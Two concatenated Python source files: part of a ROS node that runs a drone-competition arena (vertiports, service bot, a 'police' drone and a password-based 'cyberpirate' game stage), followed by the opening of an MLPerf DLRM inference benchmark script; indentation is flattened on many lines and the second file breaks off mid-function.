        self.searcher_index = self.swarm.get_pioneer_index_by_name(SEARCHER) # searcher index
self.password_received = False
self.password = DEFAULT_PASSWORD
        if self.searcher_index is None: # if no searcher is configured, stop the scenario
self.run = False
self.__access_service = access_service
self.__access_service.handler = self.handle_access
def __waiting(self):
rospy.sleep(TIME_TO_SECOND)
self.logger.sendPoliceMsg(f"Результат: {self.swarm.pioneers[self.searcher_index].info.name} - {self.swarm.pioneers[self.searcher_index].vertiport_ok.count(True)}/{COUNT_SEARCHER}")
self.next()
def spin(self):
if self.run:
            if self.number == 0: # stage one
if not self.init[0]:
self.init[0] = True
self.swarm.change_all_status(StatusPioneer.BLOCK, False)
self.swarm.change_status(self.searcher_index, StatusPioneer.ON)
if self.swarm.pioneers[self.searcher_index].vertiport_ok.count(True) == COUNT_SEARCHER:
if not self.finish[0]:
                        Thread(target=self.__waiting).start() # start the delay
self.finish[0] = True
            elif self.number == 1: # stage two
if not self.init[1]:
                    self.vertiports.set_pause(False) # enable the vertiports
                    self.swarm.change_all_status(StatusPioneer.ON) # unblock the pioneers
self.init[1] = True
if self.password_received and not self.finish[1]:
self.finish[1] = True
self.logger.sendPoliceMsg(f"Команда киберпиратов взломала сервис бота")
elif self.number == 2: # третий этап
self.vertiports.all_zero()
self.run = False
    def handle_access(self, request): # password-check service handler
self.password_received = (request.password == self.password)
return AccessResponse(self.password_received)
    def next(self): # advance to the next scenario stage
if self.run:
if self.number < len(self.init):
self.number += 1
else:
self.run = False
    def reset(self): # TODO restart the scenario
self.number = -1
class VertiportsController(): # vertiport control class
def __init__(self, polygon_object = None):
self.status = []
self.position = []
self.full = []
detect_array = []
if polygon_object is not None:
for object in polygon_object:
if replace_number(object.type) == "vertiport":
self.position.append(object.position)
self.full.append(None)
detect_array.append(StringArray())
self.detect = StringArray2D(detect_array)
self.__status_subscriber = Subscriber("vertiports/status", VertiportsStatus, self.__callback_status)
rospy.wait_for_service("vertiports/control")
self.__vertiports_proxy = ServiceProxy("vertiports/control", VertiportSet)
        self.__vertiports_pause = ServiceProxy("vertiports/pause", SetBool)
def __callback_status(self, data):
self.status = data.status.data
    def set_vertiport(self, index, message): # request to occupy a vertiport
return self.__vertiports_proxy(index, message)
    def all_zero(self): # reset all vertiports
self.status = []
self.set_pause()
self.set_pause(False)
    def set_full(self, index, name, message): # occupy a vertiport, with validation
if message:
if self.status[index] == StatusVertiport.READY.value:
if self.full[index] is None:
self.full[index] = name
self.set_vertiport(index, message)
# rospy.loginfo(f"{index}, {name}, {message} {True}")
return True
else:
if self.status[index] == StatusVertiport.BLOCK.value:
if self.full[index] == name:
self.full[index] = None
self.set_vertiport(index, message)
# rospy.loginfo(f"{index}, {name}, {message} {True}")
return True
# rospy.loginfo(f"{index}, {name}, {message} {False}")
return False
    def set_pause(self, command = True): # pause vertiport operation
        self.__vertiports_pause(command)
    def check(self): # TODO check vertiport readiness
        # assumption: readiness is judged from status alone; `self.color` is never defined on this class
        return len(self.status) > 0
class PioneerController(): # pioneer control class
def __init__(self, status_publisher, request_service, police_publisher, logger = None):
self.logger = logger
names = get_pioneers_name()
names.sort()
self.pioneers = []
self.pioneers_last_pos = []
self.pioneers_last_pos_time = []
self.police = None
for name in names:
            if name == POLICE: # identify the police drone
pioneer = Police(namespace=name, flight_callback = self.callback)
self.police = pioneer
else:
pioneer = Pioneer(namespace=name, flight_callback = self.callback)
self.pioneers.append(pioneer)
self.pioneers_last_pos_time.append(0.0)
self.pioneers_last_pos.append(Point())
self.__request_service = request_service
        self.__request_service.handler = self.__handle_request
self.__status_publisher = status_publisher
self.__status_publisher.publish(self.get_status_array())
self.__police_publisher = police_publisher
    def get_pioneer_index_by_name(self, name): # get a pioneer's index by name
for i in range(len(self.pioneers)):
if self.pioneers[i].info.name == name:
return i
    def get_status_array(self): # get the array of pioneer statuses
status = []
for pioneer in self.pioneers:
status.append(pioneer.info)
return status
    def __round_point(self, point): # round a point's coordinates
point.x = round(point.x, 1)
point.y = round(point.y, 1)
point.z = round(point.z, 1)
return point
    def change_status(self, index, status): # change one pioneer's status
self.pioneers[index].info.status = status.value
self.__status_publisher.publish(self.get_status_array())
    def change_all_status(self, status, publish = True): # change every pioneer's status
for pioneer in self.pioneers:
pioneer.info.status = status.value
if publish:
self.__status_publisher.publish(self.get_status_array())
    def __handle_request(self, request): # handler for a hacker-blocking request
        if self.police is not None:
            index = self.get_pioneer_index_by_name(request.name)
            pioneer = self.pioneers[index]
            position = pioneer.navigationManager.lps.position()
            police_position = self.police.get_police_position()
            if check_range(position, police_position, POLICE_DETECT_RANGE_SECOND, POLICE_DETECT_RANGE_SECOND, POLICE_DETECT_RANGE_HEIGHT) and not pioneer.inVertiport:
                self.change_status(index, StatusPioneer.BLOCK)
                self.logger.sendPoliceMsg(f"The police drone intercepted aerobike {pioneer.info.name}")
Thread(target=self.__blocking, args=(index, BLOCKING_TIME,)).start()
return GoToLandResponse(True)
else:
return GoToLandResponse(False)
    def callback(self, data, name): # autopilot event handler
        event = data.data
        index = self.get_pioneer_index_by_name(name)
        if event == CallbackEvent.SHOCK:
            self.change_status(index, StatusPioneer.ERROR)
            self.logger.sendShockMsg(f"{name}: suspected collision")
elif event == CallbackEvent.TAKEOFF_COMPLETE:
self.pioneers_last_pos_time[index] = rospy.Time.now().to_sec()
self.pioneers_last_pos[index] = self.__round_point(self.pioneers[index].navigationManager.lps.position())
    def check(self): # check the pioneers
        charge_status = []
        # lps_status = []
        yaw_status = []
        # alive = []
        msgs = []
        for pioneer in self.pioneers:
            charge = pioneer.charge > MIN_CHARGE
            charge_status.append(charge)
            if not charge:
                msgs.append(f"{pioneer.info.name}: battery charge low")
            yaw = pioneer.navigationManager.lps.yaw()
            yaw_st = (yaw < PIONEER_DEGREES_OK + PIONEER_DEGREES_RANGE) and (yaw > PIONEER_DEGREES_OK - PIONEER_DEGREES_RANGE)
            if not yaw_st:
                msgs.append(f"{pioneer.info.name}: incorrect yaw ({round(yaw, 1)})")
yaw_status.append(yaw_st)
# try:
# status = pioneer.boardManager.runStatus()
# alive.append(status)
# self.change_status()
# except:
# pass
if all(charge_status) and all(yaw_status):
return True, msgs
else:
return False, msgs
    def __arming_by_time(self, index, time): # arm the motors, then disarm after a delay
self.pioneers[index].flightController.preflight()
rospy.sleep(time)
self.pioneers[index].flightController.disarm()
    def check_motor(self): # check that the motors start
for index in range(len(self.pioneers)):
Thread(target=self.__arming_by_time, args=(index, ARM_TIME,)).start()
    def check_colision(self): # TODO collision check
        for i in range(len(self.pioneers) - 1):
            for j in range(i + 1, len(self.pioneers)):
                position1 = self.pioneers[i].navigationManager.lps.position()
                position2 = self.pioneers[j].navigationManager.lps.position()
                if ((abs(position1.x - position2.x) <= COLISION_DISTANCE) and (abs(position1.y - position2.y) <= COLISION_DISTANCE)):
self.change_status(i, StatusPioneer.ERROR)
self.change_status(j, StatusPioneer.ERROR)
    def __blocking(self, index, time): # block a pioneer
self.pioneers[index].flasher.setPower(False)
self.pioneers[index].ledController.changeAllColor(255,130,0)
rospy.sleep(time)
self.change_status(index, StatusPioneer.ON)
self.pioneers[index].ledController.changeAllColor(0,0,0)
    def check_police_detect(self): # check for entry into the police detection zones
if self.police is not None:
for pioneer in self.pioneers:
if pioneer.info.name != POLICE:
position = pioneer.navigationManager.lps.position()
position_police = self.police.get_police_position()
if check_range(position, position_police, POLICE_DETECT_RANGE_FIRST, POLICE_DETECT_RANGE_FIRST, POLICE_DETECT_RANGE_HEIGHT):
                        if pioneer.info.status != StatusPioneer.BLOCK.value:
if KIBERPRO_TEAM.count(pioneer.info.name) == 0:
try:
pioneer.flasher.changeColor([[255, 130, 0]])
pioneer.flasher.setPower()
except:
pass
detect = PoliceDetect()
detect.name = pioneer.info.name
detect.position = position
detect.blocking = check_range(position, position_police, POLICE_DETECT_RANGE_SECOND, POLICE_DETECT_RANGE_SECOND, POLICE_DETECT_RANGE_HEIGHT) and not pioneer.inVertiport
self.__police_publisher.publish(detect)
else:
try:
if pioneer.flasher.checkRequestColors([[255, 130, 0]]) and pioneer.flasher.power:
pioneer.flasher.setPower(False)
except:
pass
    def check_zombie(self): # TODO check for "zombie" (stuck) pioneers
        for index in range(len(self.pioneers)):
            position = self.__round_point(self.pioneers[index].navigationManager.lps.position())
time_now = rospy.Time.now().to_sec()
if position == self.pioneers_last_pos[index]:
if time_now - self.pioneers_last_pos_time[index] >= ZOMBIE_TIME:
self.change_status(index, StatusPioneer.ERROR)
else:
self.pioneers_last_pos[index] = position
self.pioneers_last_pos_time[index] = time_now
    def land_all(self): # land all pioneers
for index in range(len(self.pioneers)):
try:
self.change_status(index, StatusPioneer.BLOCK)
self.pioneers[index].flightController.landing()
except:
pass
    def off_led_all(self): # turn off every pioneer's LEDs
for index in range(len(self.pioneers)):
try:
self.pioneers[index].flasher.setPower(False)
except:
pass
try:
self.pioneers[index].ledController.changeAllColor(0, 0, 0)
except:
pass
    def restart_all(self): # restart all pioneers
for index in range(len(self.pioneers)):
self.pioneers[index].boardManager.restart()
    def print_result(self): # log each pioneer's vertiport-visit results
        for pioneer in self.pioneers:
            self.logger.sendPoliceMsg(f"Result: {pioneer.info.name} - {pioneer.vertiport_ok.count(True)}/{len(pioneer.vertiport_ok)}")
class CarController: # service-bot (car) controller
def __init__(self, car_position_publisher = None, logger = None, generation_password_trigger = None):
self.position = Point()
self.run = False
self.full = None
self.logger = logger
self.__generation_password_trigger = generation_password_trigger
self.__pause_service = Service("car/pause", Trigger, self.handle_pause)
rospy.wait_for_service("car/run")
self.__run_proxy = ServiceProxy("car/run", SetBool)
self.__continue_proxy = ServiceProxy("car/continue", Empty)
self.__position_subscriber = Subscriber("car/position", Point, self.callback)
self.__car_position_publisher = car_position_publisher
def handle_pause(self, request): # pause request handler
if self.__car_position_publisher is not None:
self.run = False
self.logger.sendPolygonMsg("Service bot is ready for loading")
self.__car_position_publisher.publish(self.position)
response = TriggerResponse()
if self.__generation_password_trigger is not None:
response.message = self.__generation_password_trigger()
return response
return TriggerResponse()
def callback(self, data): # position topic callback
self.position = data
def __release(self): # resume movement after a fixed delay
rospy.sleep(30)
if not self.run:
self.logger.sendPolygonMsg("Service bot resumes movement")
self.full = None
self.run_continue()
def set_run(self, command=True): # start or stop the car
self.run = command
self.__run_proxy(command)
def run_continue(self): # resume movement
self.run = True
self.__continue_proxy()
def set_full(self, name, message): # load/unload request
if message:
if not self.run:
if self.full is None:
self.logger.sendPolygonMsg("Service bot is blocked")
Thread(target=self.__release).start()
self.full = name
return True
else:
if not self.run:
if self.full == name:
self.logger.sendPolygonMsg("Сервис бот выгружен и продолжает движение")
self.full = None
self.run_continue()
return True
return False
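# NOTE: set_full(name, True) claims the already-paused bot for one drone and
# arms a 30-second auto-release via __release; a later set_full(name, False)
# from the same drone releases it early.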
class TerminalActionServer: # terminal action server
def __init__(self, name):
self.command = TerminalCommand.RESET
self.msg = []
self.__server = SimpleActionServer(name, CommandAction, self.execute, False)
self.__server.start()
def reset(self): # clear the terminal command
self.command = TerminalCommand.RESET
def send_msg(self, msg = ""): # добавить сообщения в отправку
self.msg.append(msg)
def execute(self, goal): # execute a command on receipt
self.command = TerminalCommand(goal.command)
while ((self.command != TerminalCommand.RESET) or (len(self.msg) > 0)):
while len(self.msg) > 0:
self.__server.publish_feedback(CommandFeedback(self.msg[0]))
rospy.sleep(0.05)
self.msg.pop(0)
self.__server.set_succeeded(CommandResult(True))
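# NOTE: execute() streams queued messages as action feedback and reports
# success only after reset() has been called and the message queue has drained.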
class PolygonNode():
def __init__(self, rate = None, logger = None):
rospy.loginfo("Init polygon...")
self.rate = rate
self.status = StatusPolygon.INIT
self.run = True
self.check = False
self.start = False
self.__crash_one = False
self.__stop_one = False
self.car = None
self.__police_state_service = Service("polygon/police/get_state", PoliceState, self.handle_police_state)
self.__vertiport_request_service = Service("polygon/vertiport/request", GoToVertiport, self.handle_vertiport_request)
self.__car_request_service = Service("polygon/car/request", GoToCar, self.handle_car_request)
self.__pioneer_request_service = Service("polygon/pioneers/request", GoToLand, handler=None)
self.__access_service = Service("polygon/access", Access, handler=None)
self.__vertiports_pioneer_publisher = Publisher("polygon/vertiports/detect", StringArray2D, queue_size=10)
self.__pioneer_status_publisher = Publisher("polygon/pioneers/status", PioneerStatusArray, queue_size=10)
self.__police_detect_publisher = Publisher("polygon/police/detect", PoliceDetect, queue_size=10)
self.__polygon_status_publisher = Publisher("polygon/status", Int8, queue_size=10)
self.__car_position_publisher = Publisher("polygon/car/position", Point, queue_size=10)
self.__car_status_publisher = Publisher("polygon/car/status", Bool, queue_size=10)
self.__polygon_status_publisher.publish(self.status.value)
self.logger = logger
self.vertiports = VertiportsController(POLYGON_OBJECTS)
self.swarm = PioneerController(self.__pioneer_status_publisher, self.__pioneer_request_service, self.__police_detect_publisher, self.logger)
self.scene = Scenario(self.swarm, self.logger, self.vertiports, self.__access_service)
if CAR:
self.car = CarController(self.__car_position_publisher, self.logger, self.generate_password_trigger)
rospy.loginfo("Init polygon - done")
self.terminal = TerminalActionServer("/terminal/command")
def handle_police_state(self, request):
return PoliceStateResponse(self.swarm.police.get_police_position())
def handle_vertiport_request(self, request):
is_full = self.vertiports.set_full(request.index, request.name, request.message)
self.swarm.pioneers[self.swarm.get_pioneer_index_by_name(request.name)].inVertiport = request.message and is_full
return GoToVertiportResponse(is_full)
def handle_car_request(self, request):
return GoToCarResponse(self.car.set_full(request.name, request.message))
def __change_status(self, new_status):
self.status = new_status
self.__polygon_status_publisher.publish(self.status.value)
def generate_password_trigger(self):
if GENERATE_PASSWORD:
new_password = generate_password_string(PASSWORD_LENGTH)
self.scene.password = new_password
return new_password
else:
return DEFAULT_PASSWORD
def checkPioneerInVertiports(self):
detect = []
for vertiport in range(len(self.vertiports.position)):
detect_pioneer = []
for pioneer in self.swarm.pioneers:
if check_range(self.vertiports.position[vertiport], pioneer.navigationManager.lps.position(), VERTIPORT_RANGE, VERTIPORT_RANGE, 8):
detect_pioneer.append(pioneer.info.name)
pioneer.vertiport_ok[vertiport] = True
detect.append(StringArray(detect_pioneer))
self.vertiports.detect = StringArray2D(detect)
self.__vertiports_pioneer_publisher.publish(self.vertiports.detect)
def spin(self):
if self.terminal.command != TerminalCommand.RESET:
if self.terminal.command == TerminalCommand.CHECK:
self.__change_status(StatusPolygon.CHECK)
elif self.terminal.command == TerminalCommand.START:
self.__change_status(StatusPolygon.START)
elif self.terminal.command == TerminalCommand.STOP:
self.__change_status(StatusPolygon.STOP)
elif self.terminal.command == TerminalCommand.LAND:
self.swarm.land_all()
self.__change_status(StatusPolygon.NONE)
self.terminal.reset()
elif self.terminal.command == TerminalCommand.PRINT:
for pioneer in self.swarm.pioneers:
self.terminal.send_msg(pioneer.info.name)
self.terminal.reset()
elif self.terminal.command == TerminalCommand.BLOCK:
self.swarm.change_all_status(StatusPioneer.BLOCK)
self.terminal.reset()
elif self.terminal.command == TerminalCommand.UNBLOCK:
self.scene.number = 1
self.terminal.reset()
elif self.terminal.command == TerminalCommand.OFF:
self.swarm.off_led_all()
self.terminal.reset()
elif self.terminal.command == TerminalCommand.RESTART_BOARDS:
self.swarm.restart_all()
self.terminal.reset()
elif self.terminal.command == TerminalCommand.CHECK_MOTOR:
self.swarm.check_motor()
self.terminal.reset()
elif self.terminal.command == TerminalCommand.SHUTDOWN:
self.terminal.send_msg("Сервер выключается...")
self.__change_status(StatusPolygon.STOP)
self.run = False
if self.status == StatusPolygon.NONE:
self.__stop_one = False
self.check = False
self.__crash_one = False
elif self.status == StatusPolygon.CHECK:
if not self.check:
self.__crash_one = False
self.check = True
self.scene.reset()
self.logger.sendPolygonMsg("Идет проверка полигона")
self.terminal.send_msg("Идет проверка полигона...")
swarm_check_status, swarm_check_msg = self.swarm.check()
if not swarm_check_status:
for msg in swarm_check_msg:
self.terminal.send_msg(msg)
self.terminal.send_msg("Полигон сломан")
self.__change_status(StatusPolygon.CRASH)
else:
self.terminal.send_msg("Проверка полигона пройдена")
self.logger.sendPolygonMsg("Проверка полигона пройдена")
self.__change_status(StatusPolygon.NONE)
self.terminal.reset()
elif self.status == StatusPolygon.START:
if not self.start:
self.logger.sendPolygonMsg("Попытка начата")
self.scene.next()
self.terminal.send_msg("Старт попытки")
# self.swarm.check_zombie()
# self.swarm.check_colision()
if self.car is not None:
if not self.car.run:
self.car.set_run()
self.terminal.reset()
self.start = True
if not self.scene.run:
self.vertiports.all_zero()
self.swarm.change_all_status(StatusPioneer.ON)
self.swarm.check_police_detect()
self.checkPioneerInVertiports()
self.scene.spin()
if self.car is not None:
self.__car_status_publisher.publish(self.car.run)
elif self.status == StatusPolygon.STOP:
if self.start:
self.logger.sendPolygonMsg("Попытка завершена")
self.start = False
self.check = False
self.vertiports.set_pause()
self.swarm.land_all()
if self.car is not None:
self.car.set_run(False)
self.terminal.send_msg("Попытка остановлена")
self.__change_status(StatusPolygon.NONE)
self.terminal.reset()
else:
if not self.__stop_one:
self.terminal.send_msg("Попытка и так не начата")
self.terminal.reset()
self.__stop_one = True
elif self.status == StatusPolygon.CRASH:
if not self.__crash_one:
self.vertiports.set_pause()
self.__crash_one = True
self.start = False
self.check = False
if self.car is not None:
self.car.set_run(False)
if self.rate is not None:
self.rate.sleep()
return self.run
if __name__ == "__main__":
rospy.init_node("polygon_node")
rate = rospy.Rate(100)
logger = Logger()
polygon_node = PolygonNode(rate, logger)
while not rospy.is_shutdown() and polygon_node.spin():
pass
rospy.loginfo("Polygon is shutdown")
|
main.py | """
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import json
import logging
import os
import sys
import threading
import time
from multiprocessing import JoinableQueue
import mlperf_loadgen as lg
import numpy as np
import dataset
import criteo
# add dlrm code path
try:
dlrm_dir_path = os.environ['DLRM_DIR']
sys.path.append(dlrm_dir_path)
except KeyError:
print("ERROR: Please set DLRM_DIR environment variable to the dlrm code location")
sys.exit(1)
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"kaggle":
(criteo.Criteo, criteo.pre_process_criteo_dlrm, criteo.DlrmPostProcess(),
{"randomize": 'total', "memory_map": True}),
"terabyte":
(criteo.Criteo, criteo.pre_process_criteo_dlrm, criteo.DlrmPostProcess(),
{"randomize": 'total', "memory_map": True}),
}
# pre-defined command line options to simplify things. They are used as defaults and can be
# overwritten from the command line
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "terabyte",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "pytorch-native",
"model": "dlrm",
"max-batchsize": 2048,
},
"dlrm-kaggle-pytorch": {
"dataset": "kaggle",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "pytorch-native",
"model": "dlrm",
"max-batchsize": 128,
},
"dlrm-terabyte-pytorch": {
"dataset": "terabyte",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "pytorch-native",
"model": "dlrm",
"max-batchsize": 2048,
},
"dlrm-kaggle-onnxruntime": {
"dataset": "kaggle",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "onnxruntime",
"model": "dlrm",
"max-batchsize": 128,
},
"dlrm-terabyte-onnxruntime": {
"dataset": "terabyte",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "onnxruntime",
"model": "dlrm",
"max-batchsize": 2048,
},
"tf_dlrm-kaggle-tensorflow": {
"dataset": "kaggle",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "tensorflow",
"model": "tf_dlrm",
"max-batchsize": 128,
},
"tf_dlrm-terabyte-tensorflow": {
"dataset": "terabyte",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "tensorflow",
"model": "tf_dlrm",
"max-batchsize": 2048,
},
}
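# NOTE: a chosen --profile is merged over "defaults" before explicit command-line
# flags are applied, so a profile fills in dataset/backend/model/max-batchsize and
# any flag given on the command line still wins (see get_args below).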
SCENARIO_MAP = {
"SingleStream": lg.TestScenario.SingleStream,
"MultiStream": lg.TestScenario.MultiStream,
"Server": lg.TestScenario.Server,
"Offline": lg.TestScenario.Offline,
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument("--model", help="name of the mlperf model, ie. dlrm")
parser.add_argument("--model-path", required=True, help="path to the model file")
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
help="mlperf benchmark scenario, one of " + str(list(SCENARIO_MAP.keys())))
parser.add_argument("--test-num-workers", type=int, default=0, help='# of workers reading the data')
parser.add_argument("--max-ind-range", type=int, default=-1)
parser.add_argument("--data-sub-sample-rate", type=float, default=0.0)
parser.add_argument("--mlperf-bin-loader", action='store_true', default=False)
parser.add_argument("--max-batchsize", type=int, help="max batch size in a single inference")
parser.add_argument("--output", help="test results")
parser.add_argument("--inputs", help="model inputs (currently not used)")
parser.add_argument("--outputs", help="model outputs (currently not used)")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--use-gpu", action="store_true", default=False)
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--cache", type=int, default=0, help="use cache (currently not used)")
parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
parser.add_argument("--find-peak-performance", action="store_true", help="enable finding peak performance pass")
# file to use mlperf rules compliant parameters
parser.add_argument("--mlperf_conf", default="mlperf.conf", help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument("--user_conf", default="user.conf", help="user config for user LoadGen settings such as target QPS")
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--duration", type=int, help="duration in milliseconds (ms)")
parser.add_argument("--target-qps", type=int, help="target/expected qps")
parser.add_argument("--max-latency", type=float, help="mlperf max latency in pct tile")
parser.add_argument("--count-samples", type=int, help="dataset items to use")
parser.add_argument("--count-queries", type=int, help="number of queries to use")
parser.add_argument("--samples-per-query-multistream", type=int, help="query length for multi-stream scenario (in terms of aggregated samples)")
# --samples-per-query-offline is equivalent to perf_sample_count
parser.add_argument("--samples-per-query-offline", type=int, default=2048, help="query length for offline scenario (in terms of aggregated samples)")
parser.add_argument("--samples-to-aggregate-fix", type=int, help="number of samples to be treated as one")
parser.add_argument("--samples-to-aggregate-min", type=int, help="min number of samples to be treated as one in random query size")
parser.add_argument("--samples-to-aggregate-max", type=int, help="max number of samples to be treated as one in random query size")
parser.add_argument("--samples-to-aggregate-quantile-file", type=str, help="distribution quantile used to generate number of samples to be treated as one in random query size")
parser.add_argument("--samples-to-aggregate-trace-file", type=str, default="dlrm_trace_of_aggregated_samples.txt")
parser.add_argument("--numpy-rand-seed", type=int, default=123)
args = parser.parse_args()
# set random seed
np.random.seed(args.numpy_rand_seed)
# don't use defaults in argparser. Instead we default to a dict, override that with a profile
# and take this as default unless the command line gives a value
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.scenario not in SCENARIO_MAP:
parser.error("valid scanarios:" + str(list(SCENARIO_MAP.keys())))
return args
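# Hypothetical example invocation (paths are placeholders, not taken from this
# repository):
#   python main.py --profile dlrm-terabyte-pytorch --model-path ./dlrm.pt \
#       --dataset-path ./terabyte --scenario Offline --accuracy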
def get_backend(backend, dataset, max_ind_range, data_sub_sample_rate, use_gpu):
if backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
# NOTE: pass model parameters here, the following options are available
if dataset == "kaggle":
# 1. Criteo Kaggle Display Advertisement Challenge Dataset (see ./bench/dlrm_s_criteo_kaggle.sh)
backend = BackendPytorchNative(
m_spa=16,
ln_emb=np.array([1460,583,10131227,2202608,305,24,12517,633,3,93145,5683,8351593,3194,27,14992,5461306,10,5652,2173,4,7046547,18,15,286181,105,142572]),
ln_bot=np.array([13,512,256,64,16]),
ln_top=np.array([367,512,256,1]),
use_gpu=use_gpu
)
elif dataset == "terabyte":
if max_ind_range == 10000000:
# 2. Criteo Terabyte (see ./bench/dlrm_s_criteo_terabyte.sh [--sub-sample=0.875] --max-in-range=10000000)
backend = BackendPytorchNative(
m_spa=64,
ln_emb=np.array([9980333,36084,17217,7378,20134,3,7112,1442,61, 9758201,1333352,313829,10,2208,11156,122,4,970,14, 9994222, 7267859, 9946608,415421,12420,101, 36]),
ln_bot=np.array([13,512,256,64]),
ln_top=np.array([415,512,512,256,1]),
use_gpu=use_gpu
)
elif max_ind_range == 40000000:
# 3. Criteo Terabyte MLPerf training (see ./bench/run_and_time.sh --max-in-range=40000000)
backend = BackendPytorchNative(
m_spa=128,
ln_emb=np.array([39884406,39043,17289,7420,20263,3,7120,1543,63,38532951,2953546,403346,10,2208,11938,155,4,976,14,39979771,25641295,39664984,585935,12972,108,36]),
ln_bot=np.array([13,512,256,128]),
ln_top=np.array([479,1024,1024,512,256,1]),
use_gpu=use_gpu
)
else:
raise ValueError("only --max-ind-range 10M or 40M is supported")
else:
raise ValueError("only kaggle|terabyte dataset options are supported")
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
# NOTE: pass model parameters here, the following options are available
if dataset == "kaggle":
# 1. Criteo Kaggle Display Advertisement Challenge Dataset (see ./bench/dlrm_s_criteo_kaggle.sh)
backend = BackendOnnxruntime(
m_spa=16,
ln_emb=np.array([1460,583,10131227,2202608,305,24,12517,633,3,93145,5683,8351593,3194,27,14992,5461306,10,5652,2173,4,7046547,18,15,286181,105,142572]),
ln_bot=np.array([13,512,256,64,16]),
ln_top=np.array([367,512,256,1]),
use_gpu=use_gpu
)
elif dataset == "terabyte":
if max_ind_range == 10000000:
# 2. Criteo Terabyte (see ./bench/dlrm_s_criteo_terabyte.sh [--sub-sample=0.875] --max-in-range=10000000)
backend = BackendOnnxruntime(
m_spa=64,
ln_emb=np.array([9980333,36084,17217,7378,20134,3,7112,1442,61, 9758201,1333352,313829,10,2208,11156,122,4,970,14, 9994222, 7267859, 9946608,415421,12420,101, 36]),
ln_bot=np.array([13,512,256,64]),
ln_top=np.array([415,512,512,256,1]),
use_gpu=use_gpu
)
elif max_ind_range == 40000000:
# 3. Criteo Terabyte MLPerf training (see ./bench/run_and_time.sh --max-in-range=40000000)
backend = BackendOnnxruntime(
m_spa=128,
ln_emb=np.array([39884406,39043,17289,7420,20263,3,7120,1543,63,38532951,2953546,403346,10,2208,11938,155,4,976,14,39979771,25641295,39664984,585935,12972,108,36]),
ln_bot=np.array([13,512,256,128]),
ln_top=np.array([479,1024,1024,512,256,1]),
use_gpu=use_gpu
)
else:
raise ValueError("only --max-in-range 10M or 40M is supported")
else:
raise ValueError("only kaggle|terabyte dataset options are supported")
elif backend == "tensorflow":
from backend_tf import BackendTF
# NOTE: pass model parameters here, the following options are available
if dataset == "kaggle":
# 1. Criteo Kaggle Display Advertisement Challenge Dataset (see ./bench/dlrm_s_criteo_kaggle.sh)
backend = BackendTF(
dim_embed=16,
vocab_sizes=np.array([1460,583,10131227,2202608,305,24,12517,633,3,93145,5683,8351593,3194,27,14992,5461306,10,5652,2173,4,7046547,18,15,286181,105,142572]),
mlp_bottom=np.array([13,512,256,64,16]),
mlp_top=np.array([367,512,256,1]),
)
elif dataset == "terabyte":
if max_ind_range == 10000000:
# 2. Criteo Terabyte (see ./bench/dlrm_s_criteo_terabyte.sh [--sub-sample=0.875] --max-in-range=10000000)
backend = BackendTF(
dim_embed=64,
vocab_sizes=np.array([9980333,36084,17217,7378,20134,3,7112,1442,61, 9758201,1333352,313829,10,2208,11156,122,4,970,14, 9994222, 7267859, 9946608,415421,12420,101, 36]),
mlp_bottom=np.array([13,512,256,64]),
mlp_top=np.array([415,512,512,256,1]),
)
elif max_ind_range == 40000000:
# 3. Criteo Terabyte MLPerf training (see ./bench/run_and_time.sh --max-in-range=40000000)
backend = BackendTF(
dim_embed=128,
vocab_sizes=np.array([39884406,39043,17289,7420,20263,3,7120,1543,63,38532951,2953546,403346,10,2208,11938,155,4,976,14,39979771,25641295,39664984,585935,12972,108,36]),
mlp_bottom=np.array([13,512,256,128]),
mlp_top=np.array([479,1024,1024,512,256,1]),
)
else:
raise ValueError("only --max-in-range 10M or 40M is supported")
else:
raise ValueError("only kaggle|terabyte dataset options are supported")
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, batch_dense_X, batch_lS_o, batch_lS_i, batch_T=None, idx_offsets=None):
self.query_id = query_id
self.content_id = content_id
self.batch_dense_X = batch_dense_X
self.batch_lS_o = batch_lS_o
self.batch_lS_i = batch_lS_i
self.batch_T = batch_T
self.idx_offsets = idx_offsets
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
# run the prediction
processed_results = []
try:
results = self.model.predict(qitem.batch_dense_X, qitem.batch_lS_o, qitem.batch_lS_i)
processed_results = self.post_process(results, qitem.batch_T, self.result_dict)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
